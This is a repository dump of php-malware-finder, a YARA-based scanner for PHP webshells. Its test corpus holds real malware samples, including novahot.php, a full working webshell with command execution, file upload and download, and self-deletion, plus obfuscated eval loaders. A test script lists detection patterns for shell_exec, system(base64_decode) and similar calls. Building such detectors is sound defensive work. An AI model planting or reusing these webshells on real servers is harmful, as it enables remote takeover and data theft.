├── .gitignore ├── data ├── samples │ ├── real │ │ ├── ice.php │ │ ├── nano.php │ │ ├── ninja.php │ │ ├── guidtz.php │ │ ├── srt.php │ │ ├── include.php │ │ ├── sucuri_2014_04.php │ │ ├── exceptions.php │ │ ├── novahot.php │ │ └── awvjtnz.php │ ├── undetected │ │ └── smart.php │ ├── classic │ │ ├── c99.php │ │ ├── angel.php │ │ ├── c100.php │ │ ├── sosyete.php │ │ ├── cyb3rsh3ll.php │ │ ├── simattacker.php │ │ └── ajaxshell.php │ ├── obfuscators │ │ ├── online_php_obfuscator.php │ │ ├── phpencode.php │ │ └── cipher_design.php │ ├── artificial │ │ ├── bypasses.php │ │ ├── obfuscated.php │ │ └── dodgy.php │ ├── freepbx.php │ └── cpanel.php ├── whitelists │ ├── custom.yar │ ├── symfony.yar │ ├── phpmyadmin.yar │ └── magento1ce.yar ├── whitelist.yar └── php.yar ├── .dockerignore ├── go.mod ├── go.sum ├── Dockerfile ├── .github └── workflows │ ├── docker.yml │ ├── release.yml │ └── test.yml ├── utils ├── generate_whitelist.py ├── magento1_whitelist.sh ├── magento2_whitelist.sh └── mass_whitelist.py ├── Makefile ├── CONTRIBUTING.md ├── tests.sh ├── README.md ├── LICENSE └── main.go /.gitignore: -------------------------------------------------------------------------------- 1 | php-malware-finder 2 | .idea 3 | -------------------------------------------------------------------------------- /data/samples/real/ice.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /.dockerignore: -------------------------------------------------------------------------------- 1 | .idea/ 2 | .github/ 3 | utils/ 4 | php-malware-finder 5 | -------------------------------------------------------------------------------- /data/samples/real/nano.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /go.mod: 
-------------------------------------------------------------------------------- 1 | module github.com/jvoisin/php-malware-finder 2 | 3 | go 1.17 4 | 5 | require ( 6 | github.com/hillu/go-yara/v4 v4.2.4 7 | github.com/jessevdk/go-flags v1.5.0 8 | ) 9 | 10 | require golang.org/x/sys v0.4.0 // indirect 11 | -------------------------------------------------------------------------------- /data/samples/real/include.php: -------------------------------------------------------------------------------- 1 | 1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); 4 | -------------------------------------------------------------------------------- /data/whitelists/custom.yar: -------------------------------------------------------------------------------- 1 | /* Add your own rules here */ 2 | import "hash" 3 | 4 | private rule Custom : Blog 5 | { 6 | meta: 7 | generated = "2016-07-28T09:50:53.795037" 8 | 9 | condition: 10 | /* my own webapp 0.42 */ 11 | hash.sha1(0, filesize) == "deadbeaf" 12 | } 13 | 14 | -------------------------------------------------------------------------------- /data/samples/obfuscators/online_php_obfuscator.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /data/samples/artificial/bypasses.php: -------------------------------------------------------------------------------- 1 | 15 | -------------------------------------------------------------------------------- /utils/generate_whitelist.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=UTF-8 3 | 4 | import fnmatch 5 | import hashlib 6 | import os 7 | import sys 8 | 9 | try: 10 | import yara 11 | except ImportError: 12 | print('Please install python-yara') 13 | sys.exit(1) 14 | 15 | if len(sys.argv) != 3: 16 | print('Usage: %s name_of_the_rule_and_version folder_to_scan' % 
sys.argv[0]) 17 | sys.exit(1) 18 | 19 | if not os.path.isdir(sys.argv[2]): 20 | print('%s is not a folder !' % sys.argv[2]) 21 | sys.exit(1) 22 | 23 | try: 24 | rules = yara.compile(sys.path[0]+'/../php.yar', includes=True, error_on_warning=False) 25 | except yara.SyntaxError as e: 26 | print("Can't compile rules: %s" % e) 27 | sys.exit(1) 28 | 29 | output_list = list() 30 | 31 | for curdir, dirnames, filenames in os.walk(sys.argv[2]): 32 | for filename in filenames: 33 | fname = os.path.join(curdir, filename) 34 | if 0 < os.stat(fname).st_size < 5 * 1024 * 1024: 35 | matches = rules.match(fname, fast=True) 36 | if matches: 37 | with open(fname, 'rb') as f: 38 | digest = hashlib.sha1(f.read()).hexdigest() 39 | output_list.append('hash.sha1(0, filesize) == "%s" or // %s' % (digest, fname)) 40 | 41 | 42 | if output_list: 43 | output_rule = 'import "hash"\n\nrule %s\n{\n\tcondition:\n\t\t/* %s */\n\t\t' % (sys.argv[1].split(' ')[0], sys.argv[1]) 44 | output_rule += '\n\t\t'.join(output_list) 45 | output_rule += '\n\t\tfalse\n}' 46 | print(output_rule) 47 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: clean rebuild update-deps tests help docker docker-tests docker-publish 2 | 3 | NAME := php-malware-finder 4 | TAG_COMMIT := $(shell git rev-list --abbrev-commit --all --max-count=1) 5 | VERSION := $(shell git describe --abbrev=0 --tags --exact-match $(TAG_COMMIT) 2>/dev/null || true) 6 | IMAGE_VERSION := $(VERSION) 7 | DATE := $(shell git log -1 --format=%cd --date=format:"%Y%m%d%H%M") 8 | ifeq ($(VERSION),) 9 | VERSION := $(DATE) 10 | IMAGE_VERSION := latest 11 | endif 12 | LDFLAGS := "-X main.version=$(VERSION)" 13 | GO_FLAGS := -o $(NAME) -ldflags $(LDFLAGS) 14 | IMAGE_REGISTRY := ghcr.io 15 | IMAGE_REGISTRY_USER := jvoisin 16 | IMAGE_NAME := $(IMAGE_REGISTRY)/$(IMAGE_REGISTRY_USER)/$(NAME) 17 | 18 | all: php-malware-finder 19 | 
20 | php-malware-finder: ## Build application 21 | @go build $(GO_FLAGS) . 22 | 23 | clean: ## Delete build artifacts 24 | @rm -f $(NAME) 25 | 26 | rebuild: clean all ## Delete build artifacts and rebuild 27 | 28 | update-deps: ## Update dependencies 29 | @go get -u . 30 | @go mod tidy -v 31 | 32 | tests: php-malware-finder ## Run test suite 33 | @bash ./tests.sh 34 | 35 | docker: ## Build docker image 36 | docker pull $(IMAGE_NAME):latest || true 37 | docker build --pull --cache-from=$(IMAGE_NAME):latest -t $(IMAGE_NAME):latest . 38 | docker tag $(IMAGE_NAME):latest $(IMAGE_NAME):$(IMAGE_VERSION) 39 | 40 | docker-tests: ## Run docker image against the samples folder 41 | @(docker run --rm -v $(shell pwd)/data/samples:/data $(IMAGE_NAME):latest && exit 1) || (test $$? -eq 255 || exit 1) 42 | 43 | docker-publish: ## Push docker image to the container registry 44 | @docker push $(IMAGE_NAME):latest 45 | @(test "$(IMAGE_VERSION)" != "latest" && docker push $(IMAGE_NAME):$(IMAGE_VERSION)) || true 46 | 47 | help: ## Show this help 48 | @grep -E '^[a-zA-Z_-]+:.*?## .*$$' $(MAKEFILE_LIST) | sort | awk 'BEGIN {FS = ":.*?## "}; {printf "\033[36m%-20s\033[0m %s\n", $$1, $$2}' 49 | -------------------------------------------------------------------------------- /utils/magento1_whitelist.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Quit script if something goes wrong 3 | set -o errexit -o nounset -o pipefail; 4 | 5 | SCRIPTDIR="$( dirname "$(readlink -f "$0")" )"; 6 | OUTFILE="${SCRIPTDIR}/../whitelists/magento1ce.yar"; 7 | TMPFILE="${OUTFILE}.new"; 8 | 9 | # First empty the target whitelist so we can completely generate a new one 10 | cat <"${OUTFILE}"; 11 | private rule Magento1Ce : ECommerce 12 | { 13 | condition: 14 | false 15 | } 16 | EOF 17 | 18 | # Create a temporary directory and make sure it is empty 19 | GENTEMPDIR="$( mktemp -d --suffix="_gen_whitelist_m1" )"; 20 | 21 | # Add header to whitelist tempfile 
22 | cat < "${OUTFILE}"; 53 | 54 | # Clean up 55 | rm "${TMPFILE}"; 56 | rm -rf "${GENTEMPDIR}"; 57 | -------------------------------------------------------------------------------- /data/samples/obfuscators/cipher_design.php: -------------------------------------------------------------------------------- 1 | +*OJHj1.)n-$HjFsz)&D+.84k?9#+RaqlHb(Ors0cK-DC.$GcReUQ*-(z8#qA=1G&?j=O*jZkRv6Cr$GCTjDAHXZAKb=kr9UxHeZQ=n6hKa#X_bCXD9_OgXZCR5d+.$Dc.X(A*udk*1v+*AZA*5Gc78uA*ej&.(0kEPD&.1#C.8vxEP5k.8sCrndOr1G&.$K&?PjCT#dCH80&.(GATPU+.ndnreT+HPU)n5dO=84kgCGz.XTzv(7xDc#h_Obh,cbhKenh_c6e_C6e_cNh,a6h,aFxge#O*utcKb(Q.(Ul,aZwgj=Cr8(+Tdv_Uv#)_a-_D7#)n1X_Uv#))#v_D$z)nF-h,7#)n1Xh,7#h)vLAHAsk?sEOHe(eKVfA.8KkrV(lReUCqVTl.&6&*9Kkrj#C=8DCTsEOHe(eKVfA.8KkrV(l.ATA*$vl?Vz)_PXh,$zh_PX_U(z)_PXx?Vzh_PXh7v#hnF-_Uv#hn1X_UvZl)v4Xr$5zT#gX?9)Ojs4Q.s(&gJj8E(fkKdI)71Plrb,X($=ARe$)gOJzH$l*v(we.XRh?hb87VIC=&jw_AhVK$85.j#kT$Hng(?X*(U__hT*)C4XU$?5UV$Vv&c)nZx_7jw_jPVn(en88AH*$(+O*XKA.8=ArsZ+=b4k*90CR$TCgVj&q&uQHJ-hKhUe_Ogw,v#xE#sX?n=lEdZx8FNznaKzTCZl)vLC=8U&HXGw#MMn(1n*$VOn(V$5v8O58V)Hjen8$V)878nV81$878$n(XOHU$?8$e$njXf8$1)V8X?V8VP878OV8V?njeO5(XfnjXn8$snV8V_nv8)nje_V8X_HU8?87$_58X_V8VOHjV$njV)nv$_V81_V8e$581)878n8$1f878$n(Xn8$1O*7$n5v8_8$sfnU8)Hje?Vn$fnjen87Xn*$V?8$X$V8efnv8?8$V?5v$_njVPHj1PV8V)VnXO8$1_HU8nnjePnU8P8$e_njsP8$VO8$V)8$XfHUXOHUXfV81f*$X)Hjs$5(1$HU8$87$On(Xf8$XOHjX$nv8_njV$8$V)V8XnHjsnn(1?V8XOn(Xfn(1)V81Pnje_58VOV8V?8$1O*78_nU8_8$Xf*$e$*$Vf8$sf*$X?nje?nvXfn(X)V81$n(XOn(eOV81_8$1$8$1_Vn8PV8X)V8X)5(snnjXf8$V)8$Xn8$1)58e$n(Xn58enn(1n5(VPnj1?n(sn5v8fnjV$HjVf878fn(VOHje$58VPHjenHjV)*aMMeJyrcil1q0oP8HK2D9DwLyo2SA5KtXROD9PI1kwp8whVU7FQMSl0tldTy4k38QUAPQ8NPg==V8V_878)*$sP8$V)*7$fnv$n*$snn(Vn581PnvX$Vn$)V8ennU8nn(1nnj1P5(V$HjVn58s$8$e_HjX)nU$)581_nv8f8$Vn58XnV8XnHjV)nv$fnj1)8$1O*7$Pnje?njV)5(Vn878_n(Vn581nHjenHjenHU$P*$1n878$*$s$V8VnV8XnnUXnnjXfV8V_nje)V8e)HjXn87$nV8V$njV)878_n(e$8$Xf5n$fV8VOHUX?58s)Vn$nHU$_V8e?nj1f8$1PnU$_n(X_nj1f878$Hje?878nnjenn(1P58Xn87Xn8$X)58VfHj1f8$ef8$e)87$)5(V$8$e?nv8OHUX_58V$8$V
_n(X)5n$)Hj1nnU8n 3 | -------------------------------------------------------------------------------- /data/samples/real/exceptions.php: -------------------------------------------------------------------------------- 1 | "D", "C"=>"B", "B"=>"4", "E"=>"F", "D"=>"C", "F"=>"7", "1"=>"E", "0"=>"9", "3"=>"0", "2"=>"2", "5"=>"A", "4"=>"8", "7"=>"1", "6"=>"3", "9"=>"5", "8"=>"6");$fuwkgtdbkv = "DgokZGVmYXVsdE0hY6Rpb2BgPS5nQ3MnOwoKQGluaV0zZXQoJ2Vycm0yX2xvZycsTlVMTDk"."FDkCpbmlfc2V3KDdsb2dfZXJyb6JzJywwKTsKQGluaV0zZXQoJ27heE0leGVjdXRpb29fdGltZSc"."sMDkFDkCzZXRfdGltZV0saW7pdDgwKTsKQHNldE0tYWdpY70xdW03ZXNfcnVudGltZSgwKTsKQGR"."lZmluZSgnV7NPX7ZEUlNJT3BnLD5nMiB7LjInKTsKDmlmKGdldE0tYWdpY70xdW03ZXNfZ6CjKDkpIHsKID5gIGZ7b"."mN3aW0uIEdTT6N3cmlwc2xhc2hlcygkYXJyYXkpIHsKID5gID5gIDCyZXR7c"."mBgaXNfYXJyYXkoJGEycmE9KS5/IGEycmE9X27hcDgnV7NPc6RyaXCzbGEzaGVzJywgJGEycmE9KS58IHN3cmlwc2xhc2h"."lcygkYXJyYXkpOwogID5gfQogID5gJE0QT7NUIA3gV7NPc6RyaXCzbGEza"."GVzKDRfU10TVDkFDi5gID5kX3NPT3tJRS50IEdTT6N3cmlwc2xhc2hlcygkX3NPT3tJRSkFDn3KD"."mZ7bmN3aW0uIHdzb3xvZ2luKDkgewogID5gaGVhZGVyKDdIVERQLz1uMD53MAQgTm03I1ZvdW9"."kJykFDi5gIDCkaWUoIjQwNDIpOwp0DgpmdW9jdGlvbiCXU30zZXRjb20raWUoJGssIDR2"."KSCFDi5gID5kX3NPT3tJRVska73gPS5kdjsKID5gIHNldGNvb2tpZSgkaywgJHYpOwp0DgppZ"."ighZW7wdHkoJGE7dGhfcGEzcykpIHsKID5gIGlmKGlzc2V3KDRfU10TVEsncGEzcyddKS5mJi5obWQ7KDRfU10TVEsncGEzc"."yddKS50PS5kYXV3aE0wYXNzKSkKID5gID5gIDCXU30zZXRjb20"."raWUobWQ7KDRfU3VSVkVSWydIVERQX3hPU7QnXSksIDRhdXRoX6Chc6MpOwoKID5gIGlmIDghaXNzZXQoJE0AT30LSUVbbWQ7KDR"."fU3VSVkVSWydIVERQX3hPU7QnXSldKSC4fD5oJE0AT30LSUVbbWQ7KDRfU3VSVkVSWydIVERQX3hPU7QnXSl"."dID10IDRhdXRoX6Chc6MpKQogID5gID5gIHdzb3xvZ2luKDkFDn3KDmZ7bmN3aW0uIGEjdGlvblIoKSCFDi5gIDCpZighQ"."DRfU10TVEsnZXYnXSkgewogID5gID5gIDRhIA3gYXJyYXkoDi5gID5g"."ID5gID5gIDJ7bmEtZSIgPTBgcGhwX6VuYW7lKDksDi5gID5gID5gID5gIDJwaHCfdmVyc2lvbiIgPTBgcGhwdmVyc2lvbigpL5og"."ID5gID5gID5gID5id6NvX6ZlcnNpb2BiIA3+IEdTT70WRVJTSU0OL5ogID5gID5gID5gID5ic2EmZW7vZGUiIA3+I1CpbmlfZ2V3"."KDdzYWZlX27vZGUnKQogID5gID5gIDkFDi5gID5gID5gZWNobyCzZX
JpYWxpemUoJG1pOwogID5gfSClbHNlIHsKID5"."gID5gIDCldmEsKDRfU10TVEsnZXYnXSkFDi5gIDC0Dn3KDmlmK"."DClbXC3eSgkX7CPU7RbJ2MnXSkgKQogID5gaWYoaXNzZXQoJGRlZmE7bHRfYWN"."3aW0uKS5mJiCmdW9jdGlvbl0leGlzdHMoJ2EjdGlvbicgLi5kZGVmYXVsdE0hY6Rpb2BpKQogID5gID5gID"."RfU10TVEsnYyddIA3gJGRlZmE7bHRfYWN3aW0uOwogID5gZWxz"."ZQogID5gID5gIDRfU10TVEsnYyddIA3gJ7NlY3luZm4nOwppZiggIWVtcHR9K"."DRfU10TVEsnYyddKS5mJiCmdW9jdGlvbl0leGlzdHMoJ2EjdGlvbicgLi5kX7CPU7RbJ"."2MnXSkgKQogID5gY2EsbE07c2VyX2Z7bmMoJ2EjdGlvbicgLi5kX7CPU7RbJ2MnXSkFDmV"."BaXQF";eval/*k*/(ngomynsz($fuwkgtdbkv, $jgzzljfjj));?> -------------------------------------------------------------------------------- /utils/magento2_whitelist.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Quit script if something goes wrong 3 | set -o errexit -o nounset -o pipefail; 4 | 5 | SCRIPTDIR="$( dirname "$(readlink -f "$0")" )"; 6 | OUTFILE="${SCRIPTDIR}/../whitelists/magento2.yar"; 7 | TMPFILE="${OUTFILE}.new"; 8 | 9 | # First empty the target whitelist so we can completely generate a new one 10 | cat <"${OUTFILE}"; 11 | private rule Magento2 : ECommerce 12 | { 13 | condition: 14 | false 15 | } 16 | EOF 17 | 18 | # Create a temporary directory and make sure it is empty 19 | GENTEMPDIR="$( mktemp -d --suffix="_gen_whitelist_m2" )"; 20 | 21 | # Composer access tokens 22 | if [ ! -f "${HOME}/.composer/auth.json" ]; then 23 | echo -e "\nYou have no '.composer/auth.json' in your home dir. We will create it from a template and open an editor."; 24 | echo -e "Press [Enter] to continue. 
Press Ctrl-C if you wish to leave."; 25 | read; 26 | mkdir -p "${HOME}/.composer"; 27 | cat <"${HOME}/.composer/auth.json" 28 | { 29 | "INFO_GITHUB": "==== GET TOKEN: https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/ ====", 30 | "github-oauth": { 31 | "github.com": "---github-token-goes-here---" 32 | }, 33 | "INFO_MAGENTO": "==== GET TOKEN: https://devdocs.magento.com/guides/v2.0/install-gde/prereq/connect-auth.html ====", 34 | "http-basic": { 35 | "repo.magento.com": { 36 | "username": "---public-key-goes-here---", 37 | "password": "---private-key-goes-here---" 38 | } 39 | } 40 | } 41 | EOF 42 | editor "${HOME}/.composer/auth.json"; 43 | fi 44 | 45 | # Add header to whitelist tempfile 46 | cat < "${OUTFILE}"; 80 | 81 | # Clean up 82 | rm "${TMPFILE}"; 83 | rm -rf "${GENTEMPDIR}"; 84 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | ## Contributing 2 | 3 | First off, thank you for considering contributing to php-malware-finder. 4 | 5 | ### 1. Where do I go from here? 6 | 7 | If you've noticed a bug, an undetected sample or have a question, 8 | [search the issue tracker](https://github.com/nbs-system/php-malware-finder/issues) 9 | to see if someone else has already created a ticket. If not, go ahead and 10 | [make one](https://github.com/nbs-system/php-malware-finder/issues/new)! 11 | 12 | ### 2. Fork & create a branch 13 | 14 | If this is something you think you can fix, 15 | then [fork php-malware-finder](https://help.github.com/articles/fork-a-repo) and 16 | create a branch with a descriptive name. 17 | 18 | A good branch name would be (where issue #325 is the ticket you're working on): 19 | 20 | ```sh 21 | git checkout -b add_new_sample_wp_bruteforcer 22 | ``` 23 | 24 | ### 3. Get the test suite running 25 | 26 | Just type `make tests`, the testsuite will be run automatically. 
27 | 28 | ### 6. Make a Pull Request 29 | 30 | At this point, you should switch back to your master branch and make sure it's 31 | up to date with our upstream master branch: 32 | 33 | ```sh 34 | git remote add upstream git@github.com:nbs-system/php-malware-finder.git 35 | git checkout master 36 | git pull upstream master 37 | ``` 38 | 39 | Then update your feature branch from your local copy of master, and push it! 40 | 41 | ```sh 42 | git checkout add_new_sample_wp_bruteforcer 43 | git rebase master 44 | git push --set-upstream origin add_new_sample_wp_bruteforcer 45 | ``` 46 | 47 | Finally, go to GitHub and [make a Pull Request](https://help.github.com/articles/creating-a-pull-request) :D 48 | 49 | Travis CI will [run our test suite](https://travis-ci.org/nbs-system/php-malware-finder). 50 | We care about quality, so your PR won't be merged until all tests are passing. 51 | 52 | ### 7. Keeping your Pull Request updated 53 | 54 | If a maintainer asks you to "rebase" your PR, they're saying that a lot of code 55 | has changed, and that you need to update your branch so it's easier to merge. 56 | 57 | To learn more about rebasing in Git, there are a lot of [good](http://git-scm.com/book/en/Git-Branching-Rebasing) 58 | [resources](https://help.github.com/articles/interactive-rebase) but here's the suggested workflow: 59 | 60 | ```sh 61 | git checkout add_new_sample_wp_bruteforcer 62 | git pull --rebase upstream master 63 | git push --force-with-lease add_new_sample_wp_bruteforcer 64 | ``` 65 | 66 | ### 8. Merging a PR (maintainers only) 67 | 68 | A PR can only be merged into master by a maintainer if: 69 | 70 | 1. It is passing CI. 71 | 2. It has no requested changes. 72 | 3. It is up to date with current master. 73 | 74 | Any maintainer is allowed to merge a PR if all of these conditions are met. 75 | 76 | ### 9. Shipping a release (maintainers only) 77 | 78 | 1. Make sure that all pending and mergeable pull requests are in 79 | 2. 
Make sure that all the tests are passing, with `make tests` 80 | 3. Update the Debian changelog in `./debian/changelog` with `dch -i` 81 | 4. Commit the result 82 | 5. Create a tag for the release: 83 | 84 | ```sh 85 | git checkout master 86 | git pull origin master 87 | make tests 88 | git config user.signingkey 498C46FF087EDC36E7EAF9D445414A82A9B22D78 89 | git config user.email security@nbs-system.com 90 | git tag -s v$MAJOR.$MINOR.$PATCH -m "v$MAJOR.$MINOR.$PATCH" 91 | git push --tags 92 | ``` 93 | 94 | 6. Build the debian package with `make deb` 95 | 7. Create the [release on github](https://github.com/nbs-system/php-malware-finder/releases) 96 | 8. Do the *secret release dance* 97 | -------------------------------------------------------------------------------- /data/samples/real/novahot.php: -------------------------------------------------------------------------------- 1 | 8 | 9 | # TODO: Change this password. Don't leave the default! 10 | define('PASSWORD', 'the-password'); 11 | 12 | # Override the default error handling to: 13 | # 1. Bludgeon PHP `throw`-ing rather than logging errors 14 | # 2. Keep noise out of the error logs 15 | set_error_handler('warning_handler', E_WARNING); 16 | function warning_handler($errno, $errstr) { 17 | throw new ErrorException($errstr); 18 | } 19 | 20 | # get the POSTed JSON input 21 | $post = json_decode(file_get_contents('php://input'), true); 22 | $cwd = ($post['cwd'] !== '') ? 
$post['cwd'] : getcwd(); 23 | 24 | # feign non-existence if the authentication is invalid 25 | if (!isset($post['auth']) || $post['auth'] !== PASSWORD) { 26 | header('HTTP/1.0 404 Not Found'); 27 | die(); 28 | } 29 | 30 | # return JSON to the client 31 | header('content-type: application/json'); 32 | 33 | # if `cmd` is a trojan payload, execute it 34 | if (function_exists($post['cmd'])) { 35 | $post['cmd']($cwd, $post['args']); 36 | } 37 | 38 | # otherwise, execute a shell command 39 | else { 40 | $output = []; 41 | 42 | # execute the command 43 | $cmd = "cd $cwd; {$post['cmd']} 2>&1; pwd"; 44 | exec($cmd, $output); 45 | $cwd = array_pop($output); 46 | 47 | $response = [ 48 | 'stdout' => $output, 49 | 'stderr' => [], 50 | 'cwd' => $cwd, 51 | ]; 52 | 53 | die(json_encode($response)); 54 | } 55 | 56 | 57 | # File-download payload 58 | function payload_download ($cwd, $args) { 59 | 60 | # cd to the trojan's cwd 61 | chdir($cwd); 62 | 63 | # open the file as binary, and base64-encode its contents 64 | try { 65 | $stdout = base64_encode(file_get_contents($args['file'])); 66 | $stderr = []; 67 | } 68 | 69 | # notify the client on failure 70 | catch (ErrorException $e) { 71 | $stdout = []; 72 | $stderr = [ 'Could not download file.', $e->getMessage() ]; 73 | } 74 | 75 | die(json_encode([ 76 | 'stdout' => $stdout, 77 | 'stderr' => $stderr, 78 | 'cwd' => $cwd, 79 | ])); 80 | } 81 | 82 | # File-upload payload 83 | function payload_upload ($cwd, $args) { 84 | 85 | # cd to the trojan's cwd 86 | chdir($cwd); 87 | 88 | # base64-decode the uploaded bytes, and write them to a file 89 | try { 90 | file_put_contents( $args['dst'], base64_decode($args['data'])); 91 | $stderr = []; 92 | $stdout = [ "File saved to {$args['dst']}." 
]; 93 | } 94 | 95 | # notify the client on failure 96 | catch (ErrorException $e) { 97 | $stdout = []; 98 | $stderr = [ 'Could not save file.', $e->getMessage() ]; 99 | } 100 | 101 | die(json_encode([ 102 | 'stdout' => $stdout, 103 | 'stderr' => $stderr, 104 | 'cwd' => $cwd, 105 | ])); 106 | } 107 | 108 | # Trojan autodestruct 109 | function payload_autodestruct ($cwd, $args) { 110 | 111 | # attempt to delete the trojan 112 | try { 113 | 114 | unlink(__FILE__); 115 | $stdout = [ 'File ' . __FILE__ . ' has autodestructed.' ]; 116 | $stderr = []; 117 | } 118 | 119 | # notify the client on failure 120 | catch (ErrorException $e) { 121 | $stdout = []; 122 | $stderr = [ 'File ' . __FILE__ . ' could not autodestruct.']; 123 | } 124 | 125 | die(json_encode([ 126 | 'stdout' => [ 'Instructed ' . __FILE__ . ' to autodestruct.' ], 127 | 'stderr' => [], 128 | 'cwd' => $cwd, 129 | ])); 130 | } 131 | -------------------------------------------------------------------------------- /tests.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | PMF=./php-malware-finder 4 | SAMPLES=./data/samples 5 | 6 | type yara 2>/dev/null 1>&2 || (echo "[-] Please make sure that yara is installed" && exit 1) 7 | 8 | CPT=0 9 | run_test(){ 10 | NB_DETECTED=$(${PMF} -v -a "$SAMPLES"/"$1" 2>&1 | grep -c "$2" 2>/dev/null) 11 | 12 | if [[ "$NB_DETECTED" != 1 ]]; then 13 | echo "[-] $2 was not detected in $1, sorry" 14 | exit 1 15 | fi 16 | CPT=$((CPT+1)) 17 | } 18 | 19 | 20 | # Real samples 21 | run_test cpanel.php '0x294d:$eval: {eval(' 22 | run_test freepbx.php 'ObfuscatedPhp' 23 | run_test freepbx.php '0x72:$eval: { system(' 24 | run_test freepbx.php 'DodgyPhp' 25 | run_test freepbx.php '0x31d:$execution: system(base64_decode' 26 | 27 | # Classic shells 28 | run_test classic/ajaxshell.php 'DodgyStrings' 29 | run_test classic/ajaxshell.php '0x23e2:$: shell_exec' 30 | run_test classic/ajaxshell.php "0x16e0:\$ini_get: ini_get('safe_mode" 31 | 
run_test classic/ajaxshell.php "0x17f1:\$ini_get: ini_get('open_basedir" 32 | run_test classic/angel.php '0x1b:$disable_magic_quotes:' 33 | run_test classic/b374k.php 'ObfuscatedPhp' 34 | run_test classic/b374k.php "0xe9:\$b374k: 'ev'.'al'" 35 | run_test classic/b374k.php '0xb3:$align: $func="cr"."eat"."e_fun"."cti"."on";$b374k=$func(' 36 | run_test classic/b374k.php '0xd6:$align: ;$b374k=$func(' 37 | run_test classic/b374k.php '0x43:$: github.com/b374k/b374k' 38 | run_test classic/sosyete.php '0x194e:$execution: shell_exec($_POST' 39 | run_test classic/simattacker.php '0x158:$: fpassthru' 40 | run_test classic/r57.php '0x142a2:$: xp_cmdshell' 41 | run_test classic/cyb3rsh3ll.php '0x2200d:$udp_dos: fsockopen("udp://' 42 | run_test classic/c99.php '0x3bb4:$eval: {exec(' 43 | run_test classic/c100.php '0x4f8d:$eval: {eval(' 44 | 45 | # Obfuscated php 46 | run_test obfuscators/cipher_design.php '0x124:$execution: eval(base64_decode' 47 | run_test obfuscators/cipher_design.php '0x123:$eval: ;eval(' 48 | run_test obfuscators/online_php_obfuscator.php '0x51:$eval: ;preg_replace(' 49 | run_test obfuscators/online_php_obfuscator.php "0x52:\$pr: preg_replace('/.*/e" 50 | run_test obfuscators/online_php_obfuscator.php "SuspiciousEncoding" 51 | run_test obfuscators/phpencode.php "ObfuscatedPhp" 52 | run_test obfuscators/phpencode.php "DodgyPhp" 53 | 54 | # Artificial samples to test some rules 55 | run_test artificial/obfuscated.php '0x0:$eval: = 1.17 (using your package manager, or [manually](https://go.dev/doc/install)) 68 | - Install libyara >= 4.2 (using your package manager, or [from source](https://yara.readthedocs.io/en/stable/gettingstarted.html)) 69 | - Download php-malware-finder: `git clone https://github.com/jvoisin/php-malware-finder.git` 70 | - Build php-malware-finder: `cd php-malware-finder && make` 71 | 72 | or replace the last 2 steps with `go install github.com/jvoisin/php-malware-finder`, 73 | which will directly compile and install PMF in your 
`${GOROOT}/bin` folder. 74 | 75 | ## How to use it? 76 | 77 | ``` 78 | $ ./php-malware-finder -h 79 | Usage: 80 | php-malware-finder [OPTIONS] [Target] 81 | 82 | Application Options: 83 | -r, --rules-dir= Alternative rules location (default: embedded rules) 84 | -a, --show-all Display all matched rules 85 | -f, --fast Enable YARA's fast mode 86 | -R, --rate-limit= Max. filesystem ops per second, 0 for no limit (default: 0) 87 | -v, --verbose Verbose mode 88 | -w, --workers= Number of workers to spawn for scanning (default: 32) 89 | -L, --long-lines Check long lines 90 | -c, --exclude-common Do not scan files with common extensions 91 | -i, --exclude-imgs Do not scan image files 92 | -x, --exclude-ext= Additional file extensions to exclude 93 | -u, --update Update rules 94 | -V, --version Show version number and exit 95 | 96 | Help Options: 97 | -h, --help Show this help message 98 | ``` 99 | 100 | Or if you prefer to use `yara`: 101 | 102 | ``` 103 | $ yara -r ./data/php.yar /var/www 104 | ``` 105 | 106 | Please keep in mind that you should use at least YARA 3.4 because we're using 107 | [hashes]( https://yara.readthedocs.org/en/latest/modules/hash.html ) for the 108 | whitelist system, and greedy regexps. Please note that if you plan to build 109 | yara from sources, libssl-dev must be installed on your system in order to 110 | have support for hashes. 111 | 112 | Oh, and by the way, you can run the *comprehensive* testsuite with `make tests`. 113 | 114 | ### Docker 115 | 116 | If you want to avoid having to install Go and libyara, you can also use our 117 | docker image and simply mount the folder you want to scan to the container's 118 | `/data` directory: 119 | 120 | ``` 121 | $ docker run --rm -v /folder/to/scan:/data ghcr.io/jvoisin/php-malware-finder 122 | ``` 123 | 124 | ## Whitelisting 125 | 126 | Check the [whitelist.yar](https://github.com/jvoisin/php-malware-finder/blob/master/php-malware-finder/whitelist.yar) file. 
127 | If you're lazy, you can generate whitelists for entire folders with the 128 | [generate_whitelist.py](https://github.com/jvoisin/php-malware-finder/blob/master/php-malware-finder/utils/generate_whitelist.py) script. Run it only against a known-clean copy of the application (for example a freshly downloaded release whose integrity you have verified), because the script whitelists each matching file by its SHA-1 hash without judging its content. 129 | 130 | ## Why should I use it instead of something else? 131 | 132 | Because: 133 | - It doesn't use [a single rule per sample]( 134 | https://github.com/Neo23x0/signature-base/blob/e264d66a8ea3be93db8482ab3d639a2ed3e9c949/yara/thor-webshells.yar 135 | ), since it only cares about finding malicious patterns, not specific webshells 136 | - It has a [complete testsuite](https://github.com/jvoisin/php-malware-finder/actions), to avoid regressions 137 | - Its whitelist system doesn't rely on filenames 138 | - It doesn't rely on (slow) [entropy computation]( https://en.wikipedia.org/wiki/Entropy_(information_theory) ) 139 | - It uses a ghetto-style static analysis, instead of relying on file hashes 140 | - Thanks to the aforementioned pseudo-static analysis, it works (especially) well on obfuscated files 141 | 142 | ## Licensing 143 | 144 | PHP-malware-finder is 145 | [licensed](https://github.com/jvoisin/php-malware-finder/blob/master/php-malware-finder/LICENSE) 146 | under the GNU Lesser General Public License v3. 147 | 148 | The _amazing_ YARA project is licensed under the Apache v2.0 license. 149 | 150 | Patches, whitelists or samples are of course more than 